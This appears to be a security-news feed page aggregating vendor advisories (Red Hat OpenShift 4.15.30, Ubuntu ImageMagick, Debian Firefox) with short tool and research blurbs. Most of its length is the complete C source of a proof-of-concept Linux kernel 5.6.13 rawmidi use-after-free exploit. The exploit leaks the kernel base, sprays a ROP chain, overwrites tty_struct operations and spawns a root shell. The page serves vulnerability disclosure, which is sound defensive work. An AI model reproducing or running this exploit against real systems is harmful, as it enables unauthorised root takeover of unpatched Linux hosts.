Red Hat Security Advisory 2024-6016-03 - Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6016.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.30 packages and security update  
Advisory ID:        RHSA-2024:6016-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6016  
Issue date:         2024-09-05  
Revision:           03  
CVE Names:          CVE-2024-34069  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.15.30. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:6013

Security Fix(es):

* python-werkzeug: user may execute code on a developer's machine  
(CVE-2024-34069)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

CVEs:

CVE-2024-34069

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2279451

Red Hat Security Advisory 2024-6016-03

Red Hat Security Advisory 2024-6013-03 - Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6013.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.30 bug fix and security update  
Advisory ID:        RHSA-2024:6013-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6013  
Issue date:         2024-09-05  
Revision:           03  
CVE Names:          CVE-2024-1737  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.30 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.30. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:6016

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* bind: bind9: BIND's database will be slow if a very large number of RRs  
exist at the same nam (CVE-2024-1737)  
* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)  
* bind: bind9: Assertion failure when serving both stale cache data and  
authoritative zone content (CVE-2024-4076)  
* helm: Missing YAML Content Leads To Panic (CVE-2024-26147)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-1737

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://bugzilla.redhat.com/show_bug.cgi?id=2298893  
https://bugzilla.redhat.com/show_bug.cgi?id=2298901  
https://bugzilla.redhat.com/show_bug.cgi?id=2298904  
https://issues.redhat.com/browse/OCPBUGS-33076  
https://issues.redhat.com/browse/OCPBUGS-36719  
https://issues.redhat.com/browse/OCPBUGS-37452  
https://issues.redhat.com/browse/OCPBUGS-38023  
https://issues.redhat.com/browse/OCPBUGS-38198  
https://issues.redhat.com/browse/OCPBUGS-38262  
https://issues.redhat.com/browse/OCPBUGS-38561  
https://issues.redhat.com/browse/OCPBUGS-38613  
https://issues.redhat.com/browse/OCPBUGS-38787  
https://issues.redhat.com/browse/OCPBUGS-38861  
https://issues.redhat.com/browse/OCPBUGS-39041  
https://issues.redhat.com/browse/OCPBUGS-39080

Red Hat Security Advisory 2024-6013-03

Proof of concept exploit that uses a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel version 5.6.13.

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <stdlib.h>  
#include <stdbool.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <sys/ioctl.h>  
#include <errno.h>  
#include <string.h>  
#include <unistd.h>  
#include <stdint.h>  
#include <sound/asound.h>  
#include <sys/mman.h>  
#include <sys/syscall.h>  
#include <linux/userfaultfd.h>  
#include <sys/timerfd.h>  
#include <sys/ipc.h>  
#include <sys/msg.h>  
#include <pthread.h>  
#include <poll.h>

#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \  
                        } while (0)

                        #define ADDRESS_PAGE_FAULT1 0x1337000  
#define ADDRESS_PAGE_FAULT2 0x3331000  
#define ADDRESS_PAGE_FAULT3 0x5551000  
#define PAGE_SIZE 0x1000  
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

uint32_t uffd;  
uint32_t fd1, fd2, fd3;  
uint64_t next;  
uint64_t fake_table;

pthread_t thread[6];

bool release_page_fault = false;

static void *page;

unsigned long pivot;  
unsigned long kernel_base;  
unsigned long timerfd_tmrproc;

unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

struct args_trigger  
{  
    char *addr;  
    int size;  
    uint32_t fd;  
};

void hexdump(uint64_t *buf, uint64_t size)  
{  
    for (int i = 0; i < size / 8; i += 2)  
    {  
        printf("0x%x ", i * 8);  
        printf("%016lx %016lx\n", buf[i], buf[i + 1]);  
    }  
}

static void save_state()  
{  
    __asm__ __volatile__(  
    "movq %0, cs;"  
    "movq %1, ss;"  
    "pushfq;"  
    "popq %2;"  
    "movq %3, %%rsp\n"  
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );  
}

static void getRootShell()  
{  
    if(getuid())  
    {  
        printf("[-] Failed to get a root");  
        exit(0);  
    }

    printf("[+] uid : %d\n", getuid());  
    printf("[+] Got root.\n");

    execl("/bin/sh", "sh", NULL);  
}

void register_userfaultfd(uint64_t *range)  
{  
    struct uffdio_api uffdio_api;  
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (uffd == -1)  
    {  
        perror("[-] userfaultfd");  
        exit(0);  
    }

    uffdio_api.api = UFFD_API;  
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    uffdio_register.range.start = (uint64_t) range;  
    uffdio_register.range.len = PAGE_SIZE;  
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)  
    {  
        perror("[-] ioctl");  
        exit(0);  
    }

    puts("[+] Userfaultfd registered");  
}

void *handler_userfaultfd(void *args)  
{  
    uint64_t uffd = *(uint64_t *)args;

    struct uffd_msg msg;  
    struct uffdio_copy uffdio_copy;  
    uint64_t nread;  
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    uint64_t m_ts = 0x000000000000ffff;  
    memcpy(page2, (char *) &m_ts, 8);

    while (true)  
    {  
        struct pollfd pollfd;  
        int nready;

        pollfd.fd = uffd;  
        pollfd.events = POLLIN;

                nready = poll(&pollfd, 1, -1);

        if (nready == -1)  
        {  
            perror("[-] poll");  
            exit(0);  
        }

        nread = read(uffd, &msg, sizeof(msg));

                if (nread == 0)  
        {  
            perror("[-] EOF on userfaultfd!\n");  
            exit(0);  
        }

        if (nread == -1)  
        {  
            perror("[-] read");  
            exit(0);  
        }

        char *page_fault_location = (char *)msg.arg.pagefault.address;

        if (msg.event != UFFD_EVENT_PAGEFAULT)  
        {  
            perror("[-] Unexpected event on userfaultfd");  
            exit(0);  
        }

        if (msg.arg.pagefault.address == (void *)0x1337000 || msg.arg.pagefault.address == (void *)0x3331000 || msg.arg.pagefault.address == (void *)0x5551000)  
        {  
            printf("[+] Page Fault triggered on address 0x%llx\n", msg.arg.pagefault.address);

            if(msg.arg.pagefault.address == (void *)0x5551000)  
            {  
                memcpy(page2, (char *) &fake_table, 8);  
            }

            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;  
            uffdio_copy.dst = (uint64_t) msg.arg.pagefault.address &~(PAGE_SIZE - 1);  
            uffdio_copy.len = PAGE_SIZE;  
            uffdio_copy.mode = 0;  
            uffdio_copy.copy = 0;

            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)  
            {  
                perror("[-] ioctl");  
                exit(0);  
            }

            release_page_fault = false;  
        }  
    }

    close(uffd);  
    puts("[+] Page fault thread finished");  
}

void *trigger_userfaultfd(struct args_trigger *args)  
{  
    char *addr = (char *) args->addr;  
    int size = args->size;  
    uint32_t fd = (uint64_t) args->fd;

    write(fd, addr, size);  
}

void send_msg(int qid, const void *msg_buf, size_t size, long mtype)  
{  
    struct msgbuf  
    {  
        long mtype;  
        char mtext[size - 0x30];  
    } msg;

    msg.mtype = mtype;  
    memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)  
    {  
        perror("msgsnd");  
        exit(1);  
    }  
}

void *recv_msg(int qid, size_t size)  
{  
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)  
    {  
        perror("msgrcv");  
        return NULL;  
    }

    return memdump;  
}

void build_rop(char *buf)  
{  
    uint64_t *rop = (uint64_t *)&buf[0x0];  
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */  
    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret  
    rop[k++] = 0x0;  
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred  
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret  
    rop[k++] = 0x8;  
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret  
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret  
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */  
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22  
    rop[k++] = 0x0; // rax  
    rop[k++] = 0x0; // rdi

        rop[k++] = (unsigned long)&getRootShell;  
    rop[k++] = (unsigned long)usr_cs;  
    rop[k++] = (unsigned long)usr_rflags;  
    rop[k++] = (unsigned long)usr_sp;  
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];  
    for (size_t i = 0; i < 12; i++)  
    {  
        if (i == 4)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret;  
            continue;  
        }

        if (i == 5)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        if (i == 6)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;  
    }

    *func_table = pivot;  
}

void pin_cpu(long cpu_id)  
{  
    cpu_set_t mask;

    CPU_ZERO(&mask);  
    CPU_SET(cpu_id, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)  
    {  
        err("`sched_setaffinity()` failed: %s", strerror(errno));  
    }

    return;  
}

void main(void)  
{  
    pin_cpu(0);

    struct snd_rawmidi_params srp;

    save_state();

    /* ===================== [ SETP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");  
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    int qid[2];  
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;  
    its.it_interval.tv_nsec = 0;  
    its.it_value.tv_sec = 9999;  
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    char *addr = page;  
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 240;  
    srp.avail_min = 1;  
    uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    struct args_trigger args;  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */  
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */  
    srp.buffer_size = 250;  
    err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* send_msg 'A' */  
    char buf[0xf8 - 0x30];  
    memset(buf, 0x41, sizeof(buf));  
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */  
    for(int i = 256 / 2; i < 256; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));  
    kernel_base = timerfd_tmrproc - 0x2201f0;  
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);  
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);  
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)  
    {  
        close(tfd[i]);  
    }

    close(fd1);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");

        release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 500;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 512");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */  
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 512 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* rop spray in kmalloc-512 */  
    char secondary_buf[0x1ea - 0x30];  
    memset(secondary_buf, 0, sizeof(secondary_buf));  
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)  
    {  
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);  
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);  
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;  
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);  
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Re-opening rawmidi");

    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 800;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by kmalloc-1024");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */  
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 1024 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    int spray[256];

    /* tty_struct spray */  
    for(int i = 0; i < 256; i++)  
    {  
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)  
        {  
            printf("[-] Failed open /dev/ptmx\n");  
        }  
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);  
    puts("[+] Page fault lock released");

    for(int i = 0; i < 256; i++)  
    {  
        ioctl(spray[i], 0, next - 8);  
    }  
}

Linux Kernel 5.6.13 Use-After-Free

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which the researcher independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models.

Mali GPU Kernel Local Privilege Escalation

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Zeek 6.0.6

Ubuntu Security Notice 6985-1 - It was discovered that ImageMagick incorrectly handled certain malformed image files. If a user or automated system using ImageMagick were tricked into opening a specially crafted image, an attacker could exploit this to cause a denial of service or execute code with the privileges of the user invoking the program.

    ==========================================================================Ubuntu Security Notice USN-6985-1September 04, 2024imagemagick vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Several security issues were fixed in ImageMagick.Software Description:- imagemagick: Image manipulation programs and libraryDetails:It was discovered that ImageMagick incorrectly handled certain malformedimage files. If a user or automated system using ImageMagick were trickedinto opening a specially crafted image, an attacker could exploit this tocause a denial of service or execute code with the privileges of the userinvoking the program.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   imagemagick                     8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   imagemagick-common              8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagick++-dev                 8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagick++5                    8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore-dev               8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickwand-dev               8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   libmagickwand5                  8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu Pro   perlmagick                      8:6.7.7.10-6ubuntu3.13+esm9                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6985-1 <https://ubuntu.com/security/notices/USN-6985-1>   CVE-2019-10131, CVE-2019-10650, CVE-2019-11470, CVE-2019-11472,   CVE-2019-11597, CVE-2019-11598, CVE-2019-12974, CVE-2019-12975,   CVE-2019-12976, CVE-2019-12978, CVE-2019-12979

Ubuntu Security Notice USN-6985-1

Debian Linux Security Advisory 5765-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5765-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 04, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-8381 CVE-2024-8382 CVE-2024-8383 CVE-2024-8384Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bookworm), these problems have been fixed inversion 115.15.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbX9bEACgkQEMKTtsN8Tjbwzg/7BRH1FshkIoqMreCmhj9AYevh3VmSLDqcUOVU0a2LrLOqcJCsRIyhhrl5BXxGt0w9Q1KOIYBlwSsRU+EAlcwlh6+1FyKqrAcc8SDN+klK7NekODMHXj4gzge3adyaVYoYpHNhfYt+aVwZD+XTrI0d64V9HsO7Jsa9bwyI+xelgxuFfb8061L4q+ViQgzyCrl+vjaS6doRK5gZCVjPeuaFPKbppO5VIapF2/RIqDqZOCrziSONeqTaw7IRPITMnEHEl/+hPK9qQOmyw/suEES/Cl7aagj5znd8pQVvwpMMql/soAGX96G+y/2dC0s4cgaxwN6JAyRao7tFbCTjHpbxK+hy6pXcEBnrMPZ79plaZQ7L5uEMX6OxgEtRWGRA10Nti1RxRT48bgx8o8BnQ7K7lIHJn8afXb5pTf9rwezRyvy0UrCHAtta6Z2galVPrb5tbPBLt8MrS0cPd+RYj1M8wgrVnxCIa8N4qHLtw0adiyZa32e+lwtCbOhMQarAobD3zFGKBJsd0/lzKjeQHgIX3hRmZ57TOAgqRR6M91bbtxpDg+dGrxMUiqV/+fF7oB3WsR4KgXJCO+1YR7khOlWieTl+2Uf/w3PT0BBE4smJ9SAa+ZZuGZFyVVdmWRP2hy3OR5h7Hpe3po59/TzMlIcm6TdhYKUp0q/ANPKFS0cu9Ks==YiPV-----END PGP SIGNATURE-----

Debian Security Advisory 5765-1

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.